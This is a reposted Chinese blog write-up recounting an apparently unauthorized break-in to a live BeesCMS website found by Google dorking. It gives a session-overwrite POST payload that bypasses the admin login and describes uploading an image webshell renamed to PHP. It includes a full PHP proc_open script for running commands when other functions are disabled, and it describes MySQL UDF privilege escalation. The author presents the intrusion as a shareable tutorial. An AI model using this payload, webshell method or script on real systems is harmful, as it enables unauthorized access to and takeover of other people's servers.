实战1记一次提至Administrator权限实战

2019-05-10 约 79 字 预计阅读 1 分钟

声明:本文 【实战1记一次提至Administrator权限实战】 由作者 PaperPen 于 2019-05-10 09:07:00 首发 先知社区 曾经 浏览数 123 次

感谢 PaperPen 的辛苦付出!

摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。


0x01 进入后台

在通过googlehack语法挖掘beescms时发现了这个站点

利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后访问/admin便可以直接进入后台

0x02 拿shell

进入后台后在‘添加产品模块’处寻找到了上传点

尝试上马,但提示‘上传图片格式不正确’,于是上传图片马抓包,在repeater里更改后缀为php,然后go

根据回显没有看出是否上传成功,但也没说失败。经过寻找在‘上传图片管理’处找到

点击图片发现解析了,直接菜刀连接,拿到shell

0x03 绕过安全模式

拿到shell后进入终端查看权限,但却发现执行命令失败,可能远程启用了安全模式

经过在网上一番查找得出:要找到未禁用的php执行函数。先上传了一个查看phpinfo的脚本,找到已禁用的函数

发现proc_open函数未被禁用,于是找到如下php脚本

<?php
    $descriptorspec=array( //这个索引数组用力指定要用proc_open创建的子进程的描述符
        0=>array('pipe','r'), //STDIN
        1=>array('pipe','w'),//STDOUT
        2=>array('pipe','w') //STDERROR
    );
    $handle=proc_open('whoami',$descriptorspec,$pipes,NULL);
    //$pipes中保存的是子进程创建的管道对应到 PHP 这一端的文件指针($descriptorspec指定的)
    if(!is_resource($handle)){
    die('proc_open failed');
    }
    //fwrite($pipes[0],'ipconfig');
    print('stdout:<br/>');
    while($s=fgets($pipes[1])){
    print_r($s);
    }
    print('===========<br/>stderr:<br/>');
    while($s=fgets($pipes[2])){
    print_r($s);
    }
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($handle);
?>

上传后可以执行命令,成功绕过安全模式

0x04 提权

上图可以看出只是iis权限,能做的事很局限,所以要想办法提权。
菜刀中虽然不能执行命令,但是可以查看文件,于是找到了数据库配置文件

发现是mysql的数据库,想到udf提权,于是上传udf提权脚本(附件中)

登录后导出udf便可以执行命令了

提权成功,但是不可以添加用户,也不能开3389。


结语:希望路过的各位大佬可以指点迷津,也欢迎各位来找我交流探讨,感谢阅读。
参考链接:
https://www.cnblogs.com/R4v3n/articles/9081202.html php限制命令执行绕过

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now